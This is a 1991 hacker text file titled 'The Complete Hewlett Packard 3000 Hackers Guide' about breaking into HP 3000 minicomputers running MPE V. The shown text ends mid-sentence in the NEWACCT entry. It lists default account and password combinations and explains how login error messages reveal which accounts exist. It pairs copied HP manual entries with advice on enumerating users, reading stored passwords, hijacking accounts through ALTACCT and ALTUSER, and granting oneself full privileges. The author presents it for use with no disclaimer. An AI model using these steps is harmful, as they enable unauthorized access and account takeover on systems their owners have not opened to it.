**************THE COMPLETE HEWLETT PACKARD 3000 HACKERS GUIDE***************** Presented this 28 day of March 1900 and 91 by AXIS Writen and Compiled by Night's Shadow With Help from INSANE! (aka Flatliner) The HP 3000 is becoming one of the most common main frame of today with the very versaltilty and english like comands of the MPE V operating system. It power and user friendliness has little rival. As good fortune would have it these qualities that have made companys like Boeing swicth to HP 3000's also make it the unsecured UNIX of the 90's........ In the following essay we will cover all aspects of the HP 3000 including, logon, login, passwords, OS, comands that are useful, log destruction, information retrvial and logout. The information in this file is for the sole purpose to be used, there is no disclamer. LOGON: Logon a HP 3000 is simple just hit the enter key a coupple of times until you get ":" which in all cases is the prompt. LOGIN: A normal login is chracterized by entering the command HELLO followed by USERNAME.ACCOUNTNAME,GROUPNAME. Note that the groupname is almost always HOME which is the default and almost never need to be typed. So an example login would be... :Hello mgr.sys /^ ^\ ^--------\ Login Command Username Accountname Now the neat thing about a HP 3000 is that they tell you what part of the login is wrong. Leave out the Hello and get "EXPECTED HELLO COMMAND" If the account is wrong you get "ACCOUNT DOES NOT EXIST" Note the username may exist in this case but since the account is wrong it gives that message. IF the account exists but the username is wrong you get "ACCOUNT EXIST, USERNAME DOES NOT". If the account and username are right but it is not in the home group it gives "ACCOUNT/USERNAME EXIST BUT NOT IN HOME GROUP". In this case enter append a group name (which will be descussed later). PASSWORDS: The following are the default Username/accounts combos that have no passwords attached to them out of the factory: *MANAGER.SYS MGR.HPWORD MGR.CCC MANAGER.COGNOS *MGR.TELESUP MGR.RJE FIELD.SERVICE MGR.COGNOS MGR.ITF3000 *FIELD.SUPPORT,PUB MGR.HPONLY *MGR.SYS MAIL.MAIL *MGR.NETBASE MAIL.TELESUP *OPERATOR.SYS MGR.CNAS *MGR.SECURITY MGR.REGO The follow are passworded as such: MGR.TELESUP Account password: HPONLY User password : MGR MGR.SYS Account password :LOTUS FIELD.SERVRICE Account password: HPWORD Well that is all the back doors the guys over at Hewlett Packard wrote, as long as I have hacked HP3000's I have never seen one where you can't get in on the defaults (smile). Note that you can switch the defaults around as long as you keep the account side on the account side and the user side on the user side. Now about groups, if you run into a login that gives you the "ACCOUNT/ USER GOOD BUT NOT IN HOME GROUP" don't worry there are two other default groups built into the machine ,PUB and ,DATA give them a try. The combos with the * have ether AM accsess or NM this is prefered. YOUR IN: Proablly with shit acsess. Just like any system you never get the kicken acsess the first try, so in this section I will descuss how you can find other accounts and gain higher acsess. The first thing you need to do is to find out how much acsess you really have this can be done with two commands, first: REPORT [groupset] [,listfile] [;VS=volset] PARAMETERS groupset Specifies the accounts and groups for which information is to be listed. The permissible entries, some of which use wildcard characters, and their capability requirements (account manager (AM) and/or system manager (SM)) are listed below. group Reports on the specified group in the logon account.This is the default for standard users, who may specify only their logon group. @ Reports on all groups in the logon account. This isthe default for account managers, but may be executed by users with AM or SM capability. group.acct Reports on the specified group in the specified account. This requires SM capability. @.acct Reports on all groups in the specified account. This requires AM capability (if it is the logon account) or SM capability for any account. @.@ Reports on all groups in all accounts. This is the default for system managers and requires SM capability. group.@ Reports on specified group in any account. This requires SM capability. The characters @, #, and ? can be used as wildcard characters, but count toward the eight-character limit. These wildcard characters have the following meanings. @ Specifies zero or more alphanumeric characters and denotes all members of the set. # Specifies one numeric character. ? Specifies one alphanumeric character. The characters can be used as follows. n@ Report on all groups starting with the character "n". @n Report on all groups ending with the character "n". n@x Report on all groups starting with the character "n" and ending with the character "x". n##...# Report on all groups starting with the character "n" followed by up to seven digits. ?n@ Report on all groups whose second character is "n". n? Report on all two-character groups starting with the character "n". ?n Report on all two-character groups ending with the character "n". These characters, when placed appropriately in the <groupset> parameter, may also be used to report on accounts. listfile Actual file designator of the output file to which information is to be written. The default is $STDLIST, but output may be redirected with a file equation as follows: FILE LIST1,DEV=LP REPORT, *LIST1 volset Informs MPE V/E to report accounting information for the specified volume set. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] aborts execution. You must have account manager (AM) or system manager (SM) capability to execute this command. OPERATION The REPORT command displays the total resource usage logged against accounts and groups, and the limits on those resources. For standard users, data is displayed for their group only; an account manager may specify all groups in his or her account; the system manager may specify any or all groups in any or all accounts. The information includes usage counts and limits for permanent file space (in sectors), CPU time (in seconds), and session connect time (in minutes). The file space usage count reflects the number of sectors used at the time the REPORT command was issued. However, CPU time and connect time usage appear as they were immediately before the beginning of the current job. EXAMPLE To obtain accounting information for your group, enter the REPORT command. Accounting information is displayed in a format similar to that of the SOPRM account shown below: REPORT @.SOPRM ACCOUNT FILESPACE-SECTORS CPU-SECONDS CONNECT-MINUTES /GROUP COUNT LIMIT COUNT LIMIT COUNT LIMIT SOPRM 99004 ** 99057 ** 88407 ** /GLOSSARY 1068 ** 542 ** 656 ** /PUB 182 ** 123 ** 1155 ** /SECT1 180 ** 85 ** 429 ** /SECT10 11779 ** 25271 ** 9716 ** /SECT2 390 ** 4123 ** 5302 ** /SECT3 10675 ** 8176 ** 13116 ** /SECT4 2372 ** 225 ** 294 ** /SECT5 46579 ** 27218 ** 25744 ** /SECT6 6008 ** 9324 ** 6638 ** /SECT7 4748 ** 8303 ** 13263 ** /SECT8 1957 ** 6348 ** 3997 ** /SECT9 3195 ** 4570 ** 4213 ** ------------------------------------------------------------------------ The following can be one of the most useful commands on the system for geting other logins. Most people never password there Account/User so it is just a matter of list the people that are on the machine-- this is a way to do it. It shows people that are runing jobs (which is any deamon task) and anyone of inportance will be running a job. SHOWJOB Displays the status information about jobs/sessions. SYNTAX [#]Snnn [#]Jnnn SHOWJOB [ STATUS ] [;*listfile] SCHED item[;item[;...]] PARAMETERS [#]Snnn The session number (assigned by MPE) of the session for which the status information is to be displayed. The information appears in Type I format, described under "OPERATION". Default is that the status information for all jobs/sessions is displayed. [#]Jnnn The job number (assigned by MPE) of the job for which status information is to be displayed. The information is in Type I format, described under "OPERATION". Default is that the status information for all jobs/sessions is displayed. STATUS Lists the number of jobs and sessions in each processing state and the current jobfence and job/session limits. This information is in Type II format, described under "OPERATION". Default is that the status information for all job/sessions is displayed. SCHED Displays only the scheduled jobs. The information is in Type III format, described under "OPERATION". *listfile Formal file designator of the file on which the output listing is written. A backreference to a FILE equation is required. The <listfile> is a temporary file with record size of 256 bytes, blocked one record per block, with Carriage Control (CCTL), with the time and date displayed. You can override the default characteristics of <listfile> with the FILE command. Default is $STDLIST. item A list of jobs/sessions whose status is displayed. Default is that the status information for all jobs/sessions is displayed. The syntax appears below. SYNTAX FOR ITEM {@J } {INTRO} [JOB= {@S }] [;{EXEC }] {WAIT [,N]} {@ } {SUSP } [,D] {[jsname,]username}] PARAMETERS FOR ITEM JOB= A list of jobs/sessions for which status information is to be displayed. Use one of the following options: @J Displays status information for all jobs. @S Displays status information for all sessions. @ Displays status information for all jobs and sessions. [jsname>,].username>.acctname The <jsname> is an optional name given to the session or job by the user. The name> parameter is the username established by the account manager. This name may consist of one to eight alphanumeric characters beginning with an alphabetic character. The <accountname> parameter is the name of the account established by the system manager. This name may consist of one to eight alphanumeric characters beginning with an alphabetic character. The "@" can be used to replace the <jsname> or <username> in a specified account. INTRO, EXEC, SUSP, or WAIT Displays the status of all jobs or sessions in a specified state. INTRO means that the job is introduced. In this case the spooler process validates the JOB command and, if the job is legitimate, copies the job input records to disk. EXEC means that the job is executing. SUSP means that the job or session is suspended, because table entries or system resources are unavailable. WAIT means that there are no available list devices for the job. WAIT has the following subparameters: N Displays the status of nondeferred READY devicefiles. D Displays the status of deferred READY devicefiles. If information for only one devicefile is displayed, output is in Type I format; if information for more than one devicefile is displayed, output is in Type I followed by Type II format. (Format types are described under "OPERATION".) USE This command may be issued from a session, job, in BREAK, or from a program. It is breakable (aborts execution). OPERATION This command enables you to determine the number of jobs and sessions in each processing state, the current jobfence and job/session limits, and allows you to keep track of individual spooled and streamed jobs that are entered in the system. EXAMPLE To determine the number of jobs and sessions in each processing state, the current jobfence and the job/session limits, enter: SHOWJOB STATUS 6 JOBS: 0 INTRO 0 WAIT; INCL 0 DEFERRED 6 EXEC; INCL 6 SESSIONS 0 SUSP JOBFENCE= 0; JLIMIT= 3; SLIMIT= 16 To get a report on all jobs and sessions in the system, enter: SHOWJOB JOBNUM STATE IPRI JIN JLIST INTRODUCED JOB NAME #S745 EXEC 29 29 MON 2:53P DL,SPL.ALANG #S746 EXEC 26 26 MON 2:53P CLI.AOPSYS 2 JOBS: 1 INTRO 0 WAIT; INCL 0 DEFERRED 2 EXEC; INCL 2 SESSIONS 0 SUSP JOBFENCE= 2; JLIMIT= 1; SLIMIT= 16 The following example of a SHOWJOB command sequence illustrates an override of the default characteristics of <listfile> with the FILE command, and shows the output produced with the new <listfile> characteristics: FILE A;REC=40,1,F,ASCII;NOCCTL SHOWJOB;*A SAVE A FCOPY FROM=A;TO= HP32212A.3.17 FILE COPIER (C) HEWLETT-PACKARD CO. 1982 MON, MAY 7, 1985, 7:54 AM JOBNUM STATE IPRI JIN JLIST INTRODUCED JOB NAME #S46 EXEC 20 20 MON 7:14A OPERATOR.SYS #S45 EXEC 47 47 MON 6:37A MAC.PUBS #S47 EXEC 10S LP MON 7:26A SUPPORT.DOC #S48 EXEC 102 102 MON 7:28A MAC.TECH #J19 EXEC 28 28 MON 6:41A JON.OSE #S49 EXEC* 34 34 MON 7:31A FLASH.G #J21 EXEC 10S LP MON 7:15A DELIVER,MAIL.MAIL #J22 EXEC 10S LP MON 7:14A RSPOOLJ,RSPOOL.SYS 8 JOBS (DISPLAYED): 0 INTRO 0 WAIT; INCL 0 DEFERRED 8 EXEC; INCL 5 SESSIONS 0 SUSP JOBFENCE= 6; JLIMIT= 4; SLIMIT= 50 EOF FOUND IN FROMFILE AFTER RECORD 17 18 RECORDS PROCESSED *** 0 ERRORS END OF SUBSYSTEM The SHOWJOB command reports a job or session as being in EXEC* when it is initializing. After initialization is complete, the state will change to EXEC . The number shown in the EXEC state is the sum of the jobs and sessions in both EXEC and EXEC*. ------------------------------------------------------------------------- The next comand list all accounts and there `ENCRYPTED' password. The neat thing is that if a person makes there onw password and doesnt have system operator encode it (as the lamers often do) it can be read! LISTACCT Lists the attributes for one account, with AM (account manager) capability, or for any or all accounts, with SM (system manager) capability. SYNTAX LISTACCT [{@ }][,listfile] {acct}] PARAMETERS @ Specifies all accounts. This is the default for users with SM capability, which is required to list all accounts. acct The name of the account whose attributes are to be listed. Account managers may specify only their own account. The default is the logon account. The characters @, #, and ? can be used as wildcard characters, but count toward the eight-character limit. These wildcard characters have the following meanings: @ Specifies zero or more alphanumeric characters and denotes all members of the set. # Specifies one numeric character. ? Specifies one alphanumeric character. You can use the characters as follows: n@ List all accounts starting with the character "n". @n Lists all accounts ending with the character "n". n@x Lists all accounts starting with the character "n" and ending with the character "x". n##...# Lists all accounts starting with the character "n" followed by up to seven digits. ?n@ Lists all accounts whose second character is "n". n? List all two-character accounts starting with the character "n". ?n List all two-character accounts ending with the character "n". listfile Destination of the attribute listing. The default is $STDLIST, but the output may be redirected with the FILE command. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] has no effect on this command. You must have system manager (SM) or account manager (AM) capability to execute this command. OPERATION This command lists the attributes for one account (AM capability) or for any or all accounts (SM capability). The listing appears as an octal dump of the account entry; each is headed by A = " " and the account name. When the dump contains alphanumeric data, a translation into ASCII appears to the right of each line. The following is a sample listing of an octal dump: A = SYS 051531 051440 020040 020040 000006 000007 177607 000713 SYS............. 000000 000000 020040 020040 020040 020040 000010 052150 ..............Th 077777 177777 000010 113257 077777 177777 000037 147337 ................ 077777 177777 004551 140036 000123 000217 .....i...S.. Each octal word in the preceding listing is displayed in the following decimal representation of the dump. The following table decodes the information. --00-- --01-- --02-- --03-- --04-- --05-- --06-- --07-- --08-- --09-- --10-- --11-- --12-- --13-- --14-- --15-- --16-- --17-- --18-- --19-- --20-- --21-- --22-- --23-- --24-- --25-- --26-- --27-- --28-- --29-- Words Content 0-3 Account name. 4-5 Account's group and user index pointers. 6-7 Account attributes. 8-9 Local attributes. 10-13 Password-encrypted. 14-15 Permanent file space usage count (in sectors). 16-17 Permanent file space limit (in sectors). 18-19 CPU time usage count (in seconds). 20-21 CPU time limit (in seconds). 22-23 Connect-time count (in minutes). 24-25 Connect-time limit (in minutes). 26 Purge and account-security flags. 27 Maximum job/session priority (numerical). 28 Command file location of account UDCs. 29 Command file location of SYS account UDCs. EXAMPLE To list the attributes of the account SYS ,enter: LISTACCT SYS A = SYS 051531 051440 020040 020040 000006 000007 177607 000713 SYS............. 000000 000000 020040 020040 020040 020040 000010 052150 ..............Th 077777 177777 000010 113257 077777 177777 000037 147337 ................ 077777 177777 004551 140036 000123 000217 .....i...S.. ---------------------------------------------------------------- ------------------------------------------------------------------------- The next is the same as above but it is for groups. LISTGROUP Prints a list of attributes for groups. SYNTAX {group.acct} {group } LISTGROUP {@.acct } [,listfile] {@ } {@.@ } PARAMETERS @ Specifies that all groups in the logon account are to be listed. This is the default. @.@ Specifies that all groups in all accounts are to be listed. Only users with SM capability may specify this option. The default is @. group.acct Specifies the group and account to be listed. Account managers cannot specify an account other than their own. group Specifies the group (in the logon account) to be listed. The default is @. @.acct Specifies that all groups in the designated account are to be listed. If an account manager specifies an account, it must be his or her own account. The default is @. The characters @, #, and ? can be used as wildcard characters, but count toward the eight-character limit. These wildcard characters have the following meanings: @ Specifies one or more alphanumeric characters ordenotes all members of the set. # Specifies one numeric character. ? Specifies one alphanumeric character. The characters can be used as follows: n@ List all groups starting with the character "n". @n List all groups ending with the character "n". n@x List all groups starting with the character "n" and ending with the character "x". n##...# List all groups starting with the character "n" followed by up to seven digits. ?n@ List all groups whose second character is "n". n? List all two-character groups starting with the character "n". ?n List all two-character groups ending with the character "n". listfile Destination of the attribute listing. The default is $STDLIST, but the output may be redirected with the FILE command. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] suspends execution. You must have account manager (AM) or system manager (SM) capability to execute this command. OPERATION This command lists the attributes for all groups in one account (AM capability) or all groups in all accounts (SM capability). Also available is information on groups spanned to private volumes (PV), whether or not the volumes are mounted when the information is requested. A sample octal dump appears below. The listing includes both group and system information, headed by "G = " and the group's name. A translation of those bytes that contain alphanumeric ASCII characters appears to the right of each line of the octal dump. G = PUB 050125 041040 020040 020040 000514 020040 020040 020040 PUB......L...... 020040 000000 001026 077777 177777 000000 046536 077777 ............M... 177777 000002 006457 077777 177777 020410 041010 000601 ............B... 000000 000516 020040 020040 020040 020040 020040 020040 ...N............ 020040 020040 020040 020040 020040 020040 000000 000000 ................ 000000 Below is the octal listing translated into its decimal representation: --00-- --01-- --02-- --03-- --04-- --05-- --06-- --07-- --08-- --09-- --10-- --11-- --12-- --13-- --14-- --15-- --16-- --17-- --18-- --19-- --20-- --21-- --22-- --23-- --24-- --25-- --26-- --27-- --28-- --29-- --30-- --31-- --32-- --33-- --34-- --35-- --36-- --37-- --38-- --39-- --40-- The information in the octal dump is decoded in the following table: Words Content 0-3 Group name, in ASCII. 4 File index pointer. 5-8 Password. 9-10 Permanent file space usage count (in sectors). 11-12 Permanent file space limit (in sectors). 13-14 CPU time usage count (in seconds). 15-16 CPU time limit (in seconds). 17-18 Connect-time count (in minutes). 19-20 Connect-time limit (in minutes). 21-22 Purge and group-security flags. 23 Capability-class attributes. 24 Group directory base linkage. 25 Group volume set definition index. 26-29 Definition's account name. 30-33 Definition's group name. 34-37 Definition's volume set name. 38 GSAVEFIPNTR 39 GMOUNTRECNTR 40 GSPARE Where: GSAVEFIPNTR contains the original group file index pointer or an address relative to the base of the SYSVS (system volume set) directory. GMOUNTRECNTR is a counter which keeps track of the number of times a group's home volume set has been bound. GSPARE is an MPE V/E reserved word. The group name and password are eight-character names, right-padded with blanks. The double-word numeric quantities are double-word integers, with %17777777777 representing "unlimited". Group attributes duplicate the second word of the double-word capability returned by the -WHO intrinsic. EXAMPLE To list the attributes of the PUB group in his or her own account, the account manager enters: LISTGROUP PUB G = PUB 050125 041040 020040 020040 000514 020040 020040 020040 PUB......L...... 020040 000000 001026 077777 177777 000000 046536 077777 ............M... 177777 000002 006457 077777 177777 020410 041010 000601 ............B... 000000 000516 020040 020040 020040 020040 020040 020040 ...N............ 020040 020040 020040 020040 020040 020040 000000 000000 ................ 000000 ------------------------------------------------------------------------- This command is the same type of thing as the last two. LISTUSER Lists attributes currently assigned to users. SYNTAX {user.acct} {user } LISTUSER {@.acct } [,listfile] {@ } {@.@ } PARAMETERS user.acct The specified user in the specified account. If account managers specify <acct>, it must be their own account. user The specified user in the logon account. @.acct All users in the specified account. Account managers may specify their own account only. @ All users in the logon account. This is the default. @.@ All users in all accounts. (The attributes of the account are also listed.) This option can be specified only by users with system manager (SM) capability. The characters @, #, and ? can be used as wildcard characters, but count toward the eight-character limit. These wildcard characters have the following meanings: @ Specifies zero or more alphanumeric characters and denotes all members of the set. # Specifies one numeric character. ? Specifies one alphanumeric character. The characters can be used as follows: n@ List all users starting with the character "n". @n List all users ending with the character "n". n@x List all users starting with the character "n" and ending with the character "x". n##...# List all users starting with the character "n" followed by up to seven digits. ?n@ List all users whose second character is "n". n? List all two-character users starting with the character "n". ?n List all two-character users ending with the character "n". listfile Destination of the attribute listing. The default is $STDLIST, but the output may be redirected with the FILE command. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] suspends execution. You must have AM (account manager) or SM (system manager) capability to execute this command. OPERATION This command generates an octal dump of the attributes currently assigned to users. Each entry is headed by "U = " and the user's name; it contains both user and system information. A translation of those bytes containing ASCII data appears to the right of each line, as shown in the sample below. Account managers may list only users in their own account, while system managers may specify all users in all accounts on the system. U = COMGRAMS 041517 046507 051101 046523 060003 000613 000000 000000 COMGRAMS........ 020040 020040 020040 020040 050125 041040 020040 020040 ........PUB..... 000000 040226 000121 .....Q The octal information is translated into a decimal representation below. --00-- --01-- --02-- --03-- --04-- --05-- --06-- --07-- --08-- --09-- --10-- --11-- --12-- --13-- --14-- --15-- --16-- --17-- --18-- Each word or group of words is decoded in the following table: WORDS CONTENT 0-3 User name 4-5 Capability 6-7 Local attributes 8-11 Password 12-15 Home group 16 Number of users logged-on 17 Maximum job priority 18 User entry in COMMAND.PUB.SYS The user name, password, and home group are eight-character names, padded from the right with blanks. The maximum job priority is a numerical quantity; 150 (%226) for example, represents the CS subqueue. EXAMPLE To list the attributes of the user MGR in the account SOPRM, enter: LISTUSER MGR.SOPRM U = MGR 046507 051040 020040 020040 077607 000713 000000 000000 MGR............. 020040 020040 020040 020040 050125 041040 020040 020040 ........PUB..... 000002 040226 000466 .....6 ------------------------------------------------------------------------- This command let's you alter anthor person account so you can seize it and give your self god acsess. ALTACCT Changes the attributes of an existing account. SYNTAX ALTACCT acctname [;PASS=[password]] [;FILES=[filespace]] [;CPU=[cpu]] [;CONNECT=[connect]] [;CAP=[capabilitylist]] [;ACCESS=[(fileaccess)]] [;MAXPRI=[subqueuename]] [;LOCATTR=[localattribute]] [;VS=[volset:{ALT }]] {SPAN} [;USERPASS=[{REQ}]] {OPT} (1) (1) The USERPASS parameter is only available if the HP Security Monitor (HP30392) has been installed. PARAMETERS acctname The name of the account to be altered. password Account password (used only for verifying logon access). If you omit this parameter, no change is made. If the system operator enters ";PASS=[RETURN]", then the existing password is removed. filespace Disk storage limit, in sectors, for the permanent files in the account. The <filespace> limit cannot be less than the number of sectors currently in use for the account. The default is unlimited file space. cpu The limit on cumulative CPU time, in seconds, for the account. This limit is checked only when a job or session is initiated, and therefore never causes the job or session to abort. The maximum value allowed is 2,147,483,647 seconds. The default is unlimited CPU time. The counter may be set to zero with the RESETACCT command. connect The limit on total cumulative job or session connect time, in minutes, for the account. This limit is checked at logon and every time a process terminates. The maximum value allowed is 2,147,483,647 minutes. The default is unlimited connect time. The counter may be set to zero with the RESETACCT command. capabilitylist List of capabilities, separated by commas, permitted to the account. Each capability is denoted by a two-letter mnemonic, as follows: System Manager = SM Account Manager = AM Account Librarian = AL Group Librarian = GL Diagnostician = DI System Supervisor = OP Network Administrator = NA Node Manager = NM Permanent Files = SF Access to nonsharable I/O devices ND Use Volumes = UV Create Volumes = CV Use Communications Subsystem= CS Programmatic Sessions = PS User Logging = LG Process Handling = PH Extra Data Segments = DS Multiple RINs = MR Privileged Mode = PM Interactive Access = IA Local Batch Access = BA The default is "AM,AL,GL,SF,ND,IA,BA" , except for the SYS account. This account has no true default: it is assigned the maximum account capabilities when the system is delivered and, under normal circumstances, should not be altered. CV capability, which permits account members to create private volumes, automatically gives the account UV capability, allowing account members to use private volumes as well. fileaccess The restrictions on file access pertinent to this account. The default is R,A,L,W,X:AC, entered as follows: [[{R} [,...]:{ANY}] [;...]] {L} {A} {W} {X} where R , L , A , W and X specify modes of access by types of users (ANY and/or AC ) as follows: R = READ L = LOCK (allows exclusive access to file) A = APPEND (implicitly specifies L also) W = WRITE (implicitly specifies A and L also) X = EXECUTE The user types are specified as follows: ANY = Any user AC = Member of this account only subqueuename Name of the highest priority subqueue that can be requested by any process of any job or session in the account, specified as AS, BS, CS, DS or ES. The default is CS . IMPORTANT NOTE: User processes executing in the AS or BS subqueues can deadlock the system. If you assign these subqueues to non-priority processes, other critical system processes may be prevented from executing. Exercise extreme caution when choosing subqueues. localattribute Local attribute of the account, as defined at the installation site. This is a double-word bitmap, of arbitrary meaning, that might be used to further classify accounts. Although it is not part of standard MPE V/E security provisions, it is available to processes through the WHO intrinsic. Programmers may use <localattribute> in their own programs to provide security. The default is double-word 0 (null). volset The volume set or class reference which, when fully qualified, is in the form <vcsid.groupname.acctname>. <vcsid> refers to a previously defined volume set or class definition. SPAN Indicates that the <acctname> is to be inserted in the accounting directory of the specified volume set (volset). The specified volume set must already be mounted (via a MOUNT command) for the SPAN operation to succeed. ALT Directs the altering of an account or group entry on the specified volume set. This option is useful only if it is necessary to alter account and group file space limits for entries that have already been spanned. OPT USERPASS=OPT specifies that users in this account may or may not have passwords. If you do not use the USERPASS parameter, the old value remains. It is available only if the HP Security Monitor has been installed. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] has no effect on this command. You must have system manager (SM) capability to use this command. OPERATION The system manager uses ALTACCT to change the attributes of an existing account. You may enter multiple keywords on a single command line, as shown in the examples. When you change one capability in a <capabilitylist> containing several defined values, you must respecify the entire <capabilitylist>. When an entire keyword parameter group is omitted from the ALTACCT command, that parameter remains unchanged for the account. When a keyword is included, but the corresponding parameter is omitted (as in ";PASS= "), the default value is assigned. The USERPASS= parameter must be used in conjunction with REQ or OPT. The old value remains in effect if the USERPASS parameter is omitted. This is only valid if you have installed the HP Security Monitor. Parameter Default Values password No password filespace Unlimited cpu Unlimited connect Unlimited capabilitylist AM,AL,GL,SF,ND,IA,BA (All accounts except SYS) SM,AM,AL,GL,DI,OP,SF,ND,PH,DS,MR,PM,IA,BA (SYS account only) fileaccess R,A,W,L,X:AC (All accounts except SYS) R,X:ANY;A,W,L:AC (SYS account only) subqueuename CS subqueue localattribute Double-word 0 (null) Any value changed with ALTACCT takes effect the next time MPE V/E is requested to check the value. If an attribute is removed from an account while users are logged on, they are not affected until they end the job or session and logon again. MPE V/E does not automatically generate a message informing users of the change; it is the system operator's responsibility to warn account members in advance of any changes. If the system operator takes a capability away from an account, all account members and groups within the account also lose the capability. You cannot remove system manager (SM) capability from the SYS account. You also cannot take AM capability away from any account. If more than one person is assigned AM capability within the account, you can remove AM capability from all but one of the users assigned it, that is, the last. EXAMPLE To change an account named AC2 so that its <password> is GLOBALX , and its <filespace> is limited to 50,000 sectors, enter: ALTACCT AC2;PASS=GLOBALX;FILES=50000 -------------------------------------------------------------------------- The following lets you change the state of a user, leting you steal a user. ALTUSER Alters attributes currently defined for a user. SYNTAX ALTUSER username [;PASS=[password]] [;CAP=[capabilitylist]] [;MAXPRI=[subqueuename]] [;LOCATTR=[localattribute]] [;HOME=[homegroupname]] [;USERPASS=[{REQ}][,EXPIRED]] (1) {OPT}] (1) The USERPASS parameter is only available if the HP Security Monitor has been installed. PARAMETERS username The name assigned to the user for a logon account. password The new password to be assigned to the user. When you enter ";PASS=[RETURN]", any existing password is removed. If you omit this parameter entirely, the password remains unchanged. capabilitylist The list of capabilities, separated by commas, permitted to this user. The capabilities assigned to the user cannot exceed those assigned to the account. Each capability is denoted by a two-letter mnemonic as follows: System Manager = SM Account Manager = AM Account Librarian = AL Group Librarian = GL Diagnostician = DI System Supervisor = OP Network Administrator = NA Node Manager = NM Permanent Files = SF Access to non-sharable I/O devices = ND Use Volumes = UV Create Volumes = CV Use Communications Subsystem = CS User Logging = LG Process Handling = PH Extra Data Segments = DS Multiple RINs = MR Privileged Mode = PM Interactive Access = IA Local Batch Access = BA Programmatic Sessions = PS The default is SF , ND , IA , and BA. Note that CV automatically gives the user UV capability. subqueuename The name of the highest priority subqueue that may be requested for any job or session initiated by the user. This parameter is specified as AS, BS, CS, DS, or ES, but cannot be greater than that specified with the NEWACCT or ALTACCT commands. The default is CS. The <subqueuename> defined for the user is checked against the <subqueuename> defined for the account at logon, and the lower priority of the two is used as the maximum priority for the job or session. If you make a request for priority when you log on, it is checked against the <subqueuename> defined for you as the user, and you are granted the lower of the two values. localattribute Defined at the installation site, this is an arbitrary double-word bitmap used to further classify users. Although it is not part of standard MPE V/E security provisions, programmers may define it (through the WHO intrinsic) to enhance the security of their own programs. The bitmap for the user's local attributes must be a subset of the bitmap for the account's local attributes. The ALTUSER command checks the local attributes of the user with those of the account. The default is double-word 0 (null). homegroupname The name of an existing group to be assigned as the home group for this user. The first user established when an account is created is by default assigned PUB as the <homegroup>. Subsequent new users have by default no <homegroup> assigned. If no <homegroup> is assigned, the user must always specify an existing group when logging on. OPT USERPASS=OPT specifies that this user may or may not have a password. It is available only if the HP Security Monitor has been installed. EXPIRED The password expires immediately. The user cannot logon without selecting a new password. It is only available if the HP Security Monitor has been installed. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] has no effect on this command. You must have account manager (AM) capability to use this command. OPERATION The ALTUSER command allows the account manager to change the password, capabilities, processing subqueue, security checking, and home group currently defined for a user. More than one of these attributes may be changed at a time by entering multiple keyword parameters on a single command line, using the ; delimiter. To change an attribute, enter the keyword and its new value. If you enter the keyword and no corresponding parameter, the default value is assigned. When an entire keyword parameter group is omitted from the ALTUSER command, the corresponding value for the user remains unchanged. When a keyword is included, but the corresponding parameter is omitted (as in ;PASS= ), a default value is assigned as follows: Parameter Default Values password Null (no password) capabilitylist SF, ND, IA, and BA (provided these capabilities have been specified for the account) subqueuename CS localattribute Null (double-word 0) homegroupname The first user established when the account is created has PUB assigned as home. Subsequent users are not assigned a home group. If a user has no home group assigned, an existing group must be specified when initiating a job or a session. When a parameter is modified with the ALTUSER command, it is immediately registered in the directory. However, it does not affect users who are currently logged on to the system. They are affected the next time they logon to the same user name and account. For this reason, you should warn users in advance of the intended changes. You should avoid changing the <capabilitylist> or <homegroupname> of the user MANAGER.SYS. SM capability cannot be taken away from MANAGER.SYS. If more than one user within an account is assigned AM capability, the capability can be removed from all but one user assigned it. The last user retains the AM capability. EXAMPLE Suppose an account's capabilities are AM, AL, GL, SF, ND, PH, DS, MR, IA, and BA . To change the <capabilitylist> of the user JONES from IA, BA, SF, PH, DS to include multiple RIN capability (MR), enter: ALTUSER JONES;CAP=IA,BA,SF,PH,DS,MR To alter two attributes, <password> and <subqueuename>, for user JONES enter: ------------------------------------------------------------------------- Now that you have great acsess here is the best command so far. It gives you the ability to make your own account. It goes something like this .... NEWACCT: Creates a new account and an account manager and PUB group associated with it. SYNTAX NEWACCT acctname,mgrname [;PASS=[password]] [;FILES=[filespace]] [;CPU=[cpu]] [;CONNECT=[connect]] [;CAP=[capabilitylist]] [;ACCESS=[fileaccess]] [;MAXPRI=[subqueuename]] [;LOCATTR=[localattribute]] [;VS=[volset:SPAN]] [;USERPASS=[{REQ}]] (1) {OPT} (1) The USERPASS parameter is available only if the HP Security Monitor (HP30392) has been installed. PARAMETERS acctname Name to be assigned to the new account. This name must contain from one to eight alphanumeric characters, beginning with an alphabetic character. mgrname Name of the account manager. This is always the first user created under the account. The account manager receives the following attributes: * User Password None * Capability List Same as the account capability list * Scheduling Priority Same as the account maximum priority * Local Attribute Same as the account local attributes * Home Group PUB The attributes of an account manager may be changed with the ALTUSER command after <mgrname> is defined. However, this user is never granted attributes greater than those assigned to the account. password Account password, used for verifying logon access only. This password must contain from one to eight alphanumeric characters beginning with an alphabetic character. The default is that no password is assigned. filespace The disk storage limit, in sectors, for the permanent files of the account. The maximum value you may define is 2,147,483,647 sectors. The default is unlimited file space. cpu Limit on total CPU time, in seconds, for this account. This limit is checked only when a job or session is initiated. Thus, the limit never causes the job or session to abort. The maximum value you may define with NEWACCT is 2,147,483,647 seconds. The default is that no limit is assigned. connect Limit on total session connect time, in minutes, for the account. This limit is checked at logon, and when the job or session initiates a new process. The maximum value you may define is 2,147,483,647 minutes. The default is that no limit is assigned. capabilitylist List of capabilities, separated by commas, permitted to this account. Each capability is denoted by a two-letter mnemonic, as follows: System Manager SM Account Manager AM Account Librarian AL Group Librarian GL Diagnostician DI System Supervisor OP Network Administrator NA Node Manager NM Permanent Files SF Access to non-sharable I/O devices ND Use Volumes UV Create Volumes CV Use Communications Subsystem CS Programmatic Sessions PS User Logging LG Process Handling PH Extra Data Segments DS Multiple RINS MR Privileged Mode PM Interactive Access IA Local Batch Access BA The default is AM,AL,GL,SF,ND,IA,BA. fileaccess File access restrictions assigned to the account. The default is R,L,A,W,X:AC. [{R} [,...]:{ANY} ] [;...] {L} {A} {W} {X} where R, L, A, W, and/or X specify modes of access by types of users (ANY or AC ) as follows: R = READ L = LOCK (allows exclusive access to file) A = APPEND (implicitly specifies L as well) W = WRITE (implicitly specifies A and L as well) X = EXECUTE The user types are specified as follows: ANY = Any user AC = Member of this account only The default is no security restrictions at the account level. Two or more modes may be 